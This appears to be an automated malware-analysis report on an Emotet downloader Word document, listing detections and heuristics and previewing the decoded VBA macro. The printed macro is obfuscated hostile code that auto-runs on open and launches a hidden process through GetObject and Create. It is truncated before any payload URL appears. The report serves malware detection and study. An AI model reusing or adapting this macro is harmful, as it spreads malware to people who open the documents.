Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6901578-0. High-severity heuristics indicate the presence of an AutoOpen VBA macro that uses the GetObject function, a common technique for executing downloaded payloads. The extracted VBA macro, while heavily obfuscated, contains calls consistent with downloading and executing external content.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6901578-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6901578-0
- VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15739 bytes |
SHA-256 (macros.bas): eb0e98ad1127097007e80f2728b9e18be6367855c4f4735dd10a96557f3d98f6
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "bABkAAkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JXZkGG"
Attribute VB_Base = "0{C9E4D484-7ED1-4A9E-8AAA-FB4049FFACCA}{C13D5912-867D-4FBC-AF1A-A4B137E70440}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "JwUAAQUA"
Sub autoopen()
On Error Resume Next
If QoQAAU = FCUQoQx Then
ZA4AXAc = 740148012 * Hex(388608128) / 819101861 + Sqr(796073623) * 74742867 / CInt(683722712) * (198858864 * 195522963)
SBAwADU = (585059973 - Chr(E4AZAU4A) / FkQQQA / 872647629 + VAZDAX_ / Fix(385129007 + Log(coBAAAA * Sgn(943410672) + SD_4kDwx / CSng(263917989))))
End If
If ZAxoAxcD = kAcUC4 Then
YXBBXQw = 390307595 * Hex(487326228) / 213075158 + Sqr(390577833) * 549641298 / CInt(717307618) * (253728359 * 230103812)
nAAUAC = (632918236 - Chr(EoQxocDo) / TA4ZGAZQ / 974843141 + XCBQXQU / Fix(808848458 + Log(wZUAAB * Sgn(462879650) + XAUAQAA / CSng(560205990))))
End If
If RADDAB = KGZAUk_ Then
I1cADB4 = 374509441 * Hex(927386870) / 939820167 + Sqr(651645585) * 754383024 / CInt(442710205) * (138859583 * 480312107)
rDAGAw = (930798243 - Chr(z_GxxUA_) / VQAAZc / 717000136 + tAQxAU1k / Fix(5581353 + Log(EAQ1okGA * Sgn(934042976) + wU1ABB_ / CSng(662376054))))
End If
Set DkAXAB = GetObject(JXZkGG.KAAZDc)
If iA1Uoo4 = QAoQx4 Then
w4_oABU_ = 523199817 * Hex(499557812) / 548069906 + Sqr(806870675) * 607474438 / CInt(695773955) * (540521087 * 532145967)
MABAA1 = (732678661 - Chr(wCZXDG) / icGBBBC / 371866974 + dA4XDQ / Fix(874653699 + Log(LQCXAU_Q * Sgn(537789196) + JAwwCQ / CSng(582829857))))
End If
If wZQckABo = pQGAAA Then
WUUwQBC = 636248740 * Hex(297540682) / 22869338 + Sqr(696039598) * 779730060 / CInt(159590812) * (134932439 * 195806744)
aQAAwAA = (103566581 - Chr(z_BAAwxB) / nUwxZD / 561802303 + rGAAQUAA / Fix(271671226 + Log(UkUAcXUU * Sgn(266035210) + dCGoQA / CSng(782421513))))
End If
If IcUAAw = zkZQxAxG Then
wBQQ_AA1 = 73388702 * Hex(706924395) / 189789370 + Sqr(328632967) * 893819377 / CInt(892671759) * (86331909 * 889325534)
cAB_AAUB = (529018291 - Chr(NXBZAU) / UQCAAA4 / 544686683 + jUAAxk / Fix(260848049 + Log(K1DAw1A * Sgn(820579750) + rDZwDx_ / CSng(584442863))))
End If
DkAXAB.ShowWindow = 34847 - 34847
If rAAAAA = OcDAxA Then
HX_A_xA = 268356235 * Hex(943096616) / 863510668 + Sqr(311037146) * 61100493 / CInt(121554886) * (577288932 * 841262464)
uZDADAA = (297829257 - Chr(hDZx4AA) / SA4AAZw / 561269094 + zUAGQk / Fix(763920411 + Log(oBAcUZQX * Sgn(437270093) + WAQAAQ1G / CSng(730724163))))
End If
If NAwwAxA = fCAwAUUC Then
mAUcXC1o = 837060003 * Hex(228383076) / 646016853 + Sqr(151558691) * 671928390 / CInt(417188366) * (52432892 * 42983134)
YAUADx = (562873880 - Chr(IAB4Ax) / qBDx1ZkA / 73227912 + OAXxkD_ / Fix(383300184 + Log(PGAUoAAc * Sgn(637861944) + WAA_Qx / CSng(183742566))))
End If
If TQXAXBBQ = B4Ao4ACw Then
PQBXAw = 24443602 * Hex(454943240) / 834026292 + Sqr(708148475) * 163566224 / CInt(205525391) * (981523969 * 696999494)
hDoXAQX = (579943260 - Chr(DQoGXA) / i4AxZcA / 394101855 + rB4_ADAB / Fix(345397091 + Log(n4AAUAZB * Sgn(149652622) + zAkUBA / CSng(604959696))))
End If
GetObject(JXZkGG.aCZAkCD). _
Create# FkQAZUUo + JXZkGG.vwAZAAGA + sxAABoA + JXZkGG.a_DAAcCA + oUwAGA + JXZkGG.KAxAQA4 + MADBAAD, vGxQUcBD, DkAXAB, kkUUA4BD
If nQkCBxAG = dABCAAAU Then
tCAAc1A_ = 837316285 * Hex(921431771) / 134830364 + Sqr(385449817) * 53325057 / CInt(746166708) * (383460613 * 107103266)
mAAUcB = (428618010 - Chr(YACQAQXB) / KCBB1B / 340291954 + iDBUcA / Fix(647037553 + Log(JcG_AAG * Sgn(421305681) + LBoABBC / CSng(3766200
... (truncated)